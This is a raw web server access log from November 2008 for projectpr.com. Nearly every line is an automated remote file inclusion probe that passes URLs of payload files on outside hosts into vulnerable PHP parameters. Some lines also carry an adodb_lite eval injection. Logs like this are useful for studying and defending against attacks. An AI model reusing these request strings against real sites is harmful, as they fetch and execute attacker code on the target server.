212.76.68.90 - - [11/Nov/2008:16:47:35 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
212.76.68.90 - - [11/Nov/2008:16:47:35 -0800] "GET /logs//errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.3.163.140 - - [11/Nov/2008:16:48:22 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=%20http://pianobarcafe.com/groups/idfx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.projectpr.com"
87.3.163.140 - - [11/Nov/2008:16:48:22 -0800] "GET //vwar/backup/errors.php?error=%20http://pianobarcafe.com/groups/idfx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.projectpr.com"
87.3.163.140 - - [11/Nov/2008:16:48:23 -0800] "GET /logs///vwar/backup/errors.php?error=%20http://pianobarcafe.com/groups/idfx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.projectpr.com"
203.22.204.187 - - [11/Nov/2008:16:48:50 -0800] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "projectpr.com"
58.227.192.80 - - [11/Nov/2008:16:53:28 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "projectpr.com"
58.227.192.80 - - [11/Nov/2008:16:53:30 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "projectpr.com"
58.227.192.80 - - [11/Nov/2008:16:53:30 -0800] "GET /logs/access_080512.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "projectpr.com"
24.143.139.77 - - [11/Nov/2008:16:53:38 -0800] "GET //?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 10027 "-" "libwww-perl/5.79" "www.projectpr.com"
200.109.205.32 - - [11/Nov/2008:16:56:21 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
200.109.205.32 - - [11/Nov/2008:16:56:21 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
200.109.205.32 - - [11/Nov/2008:16:56:21 -0800] "GET /logs/access_070912.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
84.234.72.255 - - [11/Nov/2008:16:56:34 -0800] "GET /logs/access_071012.log//?path%5Bdocroot%5D=http://www.vortexguild.org/phpRaider//authentication/smf/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.234.72.255 - - [11/Nov/2008:16:56:34 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.vortexguild.org/phpRaider//authentication/smf/fx29id.txt?? HTTP/1.1" 200 5805 "-" "Mozilla/5.0" "www.projectpr.com"
89.108.67.204 - - [11/Nov/2008:16:56:53 -0800] "GET /logs/access_071012.log///?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.projectpr.com"
89.108.67.204 - - [11/Nov/2008:16:56:54 -0800] "GET //?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 10027 "-" "libwww-perl/5.812" "www.projectpr.com"
89.108.67.204 - - [11/Nov/2008:16:56:54 -0800] "GET /logs///?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 5806 "-" "libwww-perl/5.812" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:16:57:30 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
200.109.205.32 - - [11/Nov/2008:16:57:30 -0800] "GET /logs/access_070812.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
89.108.67.204 - - [11/Nov/2008:17:01:01 -0800] "GET //?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 10027 "-" "libwww-perl/5.812" "www.projectpr.com"
85.119.152.5 - - [11/Nov/2008:17:01:44 -0800] "GET /logs/access_070812.log///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
85.119.152.5 - - [11/Nov/2008:17:01:47 -0800] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
85.119.152.5 - - [11/Nov/2008:17:03:00 -0800] "GET /logs/access_071012.log///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
59.125.96.13 - - [11/Nov/2008:17:07:31 -0800] "GET /atom.php5?page=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "projectpr.com"
212.76.68.90 - - [11/Nov/2008:17:07:51 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
202.154.56.4 - - [11/Nov/2008:17:10:12 -0800] "GET /logs/access_070912.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://bl4ckb0t.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
202.154.56.4 - - [11/Nov/2008:17:10:12 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://bl4ckb0t.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
202.154.56.4 - - [11/Nov/2008:17:10:12 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://bl4ckb0t.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
84.234.72.255 - - [11/Nov/2008:17:10:35 -0800] "GET /logs/access_070912.log//?path%5Bdocroot%5D=http://www.vortexguild.org/phpRaider//authentication/smf/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
83.222.23.200 - - [11/Nov/2008:17:11:20 -0800] "GET /logs/access_070812.log//errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
83.222.23.200 - - [11/Nov/2008:17:11:20 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
83.222.23.200 - - [11/Nov/2008:17:11:21 -0800] "GET /logs//errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
83.222.23.200 - - [11/Nov/2008:17:11:56 -0800] "GET /logs/access_070712.log//errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:17:12:00 -0800] "GET /logs/access_070912.log//include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:17:12:00 -0800] "GET /include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:17:12:01 -0800] "GET /logs//include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:12:04 -0800] "GET /logs/access_071012.log///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:12:05 -0800] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 10027 "-" "libwww-perl/5.811" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:12:05 -0800] "GET /logs///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 5806 "-" "libwww-perl/5.811" "www.projectpr.com"
83.222.23.200 - - [11/Nov/2008:17:13:16 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
65.95.57.25 - - [11/Nov/2008:17:13:45 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.projectpr.com"
65.95.57.25 - - [11/Nov/2008:17:13:45 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.projectpr.com"
72.30.142.161 - - [11/Nov/2008:17:13:57 -0800] "GET /clipart/pageHeaders/?D=A HTTP/1.0" 200 691 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:15:01 -0800] "GET /logs/access_070812.log///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:17:15:37 -0800] "GET /logs/access_071012.log//include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
89.108.67.204 - - [11/Nov/2008:17:15:55 -0800] "GET /logs/access.log////vwar/backup/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.projectpr.com"
89.108.67.204 - - [11/Nov/2008:17:15:55 -0800] "GET ///vwar/backup/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.projectpr.com"
89.108.67.204 - - [11/Nov/2008:17:15:56 -0800] "GET /logs////vwar/backup/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.projectpr.com"
24.143.139.77 - - [11/Nov/2008:17:16:33 -0800] "GET /logs/access_070912.log///?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
80.68.200.213 - - [11/Nov/2008:17:17:41 -0800] "GET /logs/access_071012.log//include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.68.200.213 - - [11/Nov/2008:17:17:42 -0800] "GET /include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.68.200.213 - - [11/Nov/2008:17:17:43 -0800] "GET /logs//include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.68.200.213 - - [11/Nov/2008:17:17:44 -0800] "GET /logs/access_071012.log//include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.68.200.213 - - [11/Nov/2008:17:17:44 -0800] "GET /include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.68.200.213 - - [11/Nov/2008:17:17:45 -0800] "GET /logs//include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.68.200.213 - - [11/Nov/2008:17:18:03 -0800] "GET /logs/access_070912.log//include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.68.200.213 - - [11/Nov/2008:17:18:05 -0800] "GET /logs/access_070912.log//include/write.php?dir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.3.163.140 - - [11/Nov/2008:17:18:38 -0800] "GET /logs/access.log/%22errors.php%22%20http://pianobarcafe.com/groups/idfx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.projectpr.com"
87.3.163.140 - - [11/Nov/2008:17:18:38 -0800] "GET /%22errors.php%22%20http://pianobarcafe.com/groups/idfx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.projectpr.com"
87.3.163.140 - - [11/Nov/2008:17:18:38 -0800] "GET /logs/%22errors.php%22%20http://pianobarcafe.com/groups/idfx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.projectpr.com"
89.108.67.204 - - [11/Nov/2008:17:23:49 -0800] "GET /logs/access_070912.log///?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:23:57 -0800] "GET /logs/access_071012.log//?path%5Bdocroot%5D=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:23:57 -0800] "GET /?path%5Bdocroot%5D=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 10027 "-" "libwww-perl/5.811" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:23:57 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 200 5805 "-" "libwww-perl/5.811" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:26:19 -0800] "GET /logs/access.log/index.php?name=PNphpBB2&file=viewtopic&t=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:26:20 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:26:20 -0800] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
219.83.125.35 - - [11/Nov/2008:17:27:21 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.projectpr.com"
219.83.125.35 - - [11/Nov/2008:17:27:21 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.projectpr.com"
72.47.208.77 - - [11/Nov/2008:17:27:56 -0800] "GET /logs/access_070912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.maria2007.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.47.208.77 - - [11/Nov/2008:17:27:56 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.maria2007.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.47.208.77 - - [11/Nov/2008:17:27:56 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.maria2007.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.47.208.77 - - [11/Nov/2008:17:29:16 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.maria2007.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.115.110.161 - - [11/Nov/2008:17:29:22 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "projectpr.com"
59.125.183.76 - - [11/Nov/2008:17:30:08 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.projectpr.com"
59.125.183.76 - - [11/Nov/2008:17:30:08 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.projectpr.com"
211.115.110.161 - - [11/Nov/2008:17:30:18 -0800] "GET /logs/access_071012.log//?path%5Bdocroot%5D=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.115.110.161 - - [11/Nov/2008:17:30:19 -0800] "GET /?path%5Bdocroot%5D=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 200 10027 "-" "libwww-perl/5.79" "www.projectpr.com"
211.115.110.161 - - [11/Nov/2008:17:30:19 -0800] "GET /logs//?path%5Bdocroot%5D=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 200 5805 "-" "libwww-perl/5.79" "www.projectpr.com"
213.193.220.6 - - [11/Nov/2008:17:31:22 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
200.35.146.224 - - [11/Nov/2008:17:31:56 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
211.115.110.161 - - [11/Nov/2008:17:32:35 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.115.110.161 - - [11/Nov/2008:17:34:42 -0800] "GET /?path%5Bdocroot%5D=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 200 10027 "-" "libwww-perl/5.79" "www.projectpr.com"
59.125.96.13 - - [11/Nov/2008:17:35:07 -0800] "GET /logs/access_070712.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
84.54.72.196 - - [11/Nov/2008:17:35:21 -0800] "GET /logs/access_070712.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.67.20.101 - - [11/Nov/2008:17:35:24 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "projectpr.com"
80.67.23.90 - - [11/Nov/2008:17:36:13 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:36:14 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:36:14 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:36:15 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:36:52 -0800] "GET /logs/access_080512.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:36:52 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "projectpr.com"
209.51.152.234 - - [11/Nov/2008:17:36:52 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "projectpr.com"
200.35.146.224 - - [11/Nov/2008:17:38:46 -0800] "GET /logs/access_080512.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
200.35.146.224 - - [11/Nov/2008:17:38:46 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
200.35.146.224 - - [11/Nov/2008:17:38:46 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
64.185.237.71 - - [11/Nov/2008:17:40:38 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.searchapedia.com/community/communityimages/f_farkle/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
64.185.237.71 - - [11/Nov/2008:17:40:38 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.searchapedia.com/community/communityimages/f_farkle/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
64.185.237.71 - - [11/Nov/2008:17:40:39 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.searchapedia.com/community/communityimages/f_farkle/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
213.193.220.6 - - [11/Nov/2008:17:40:54 -0800] "GET /logs/access_080512.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
213.193.220.6 - - [11/Nov/2008:17:40:54 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
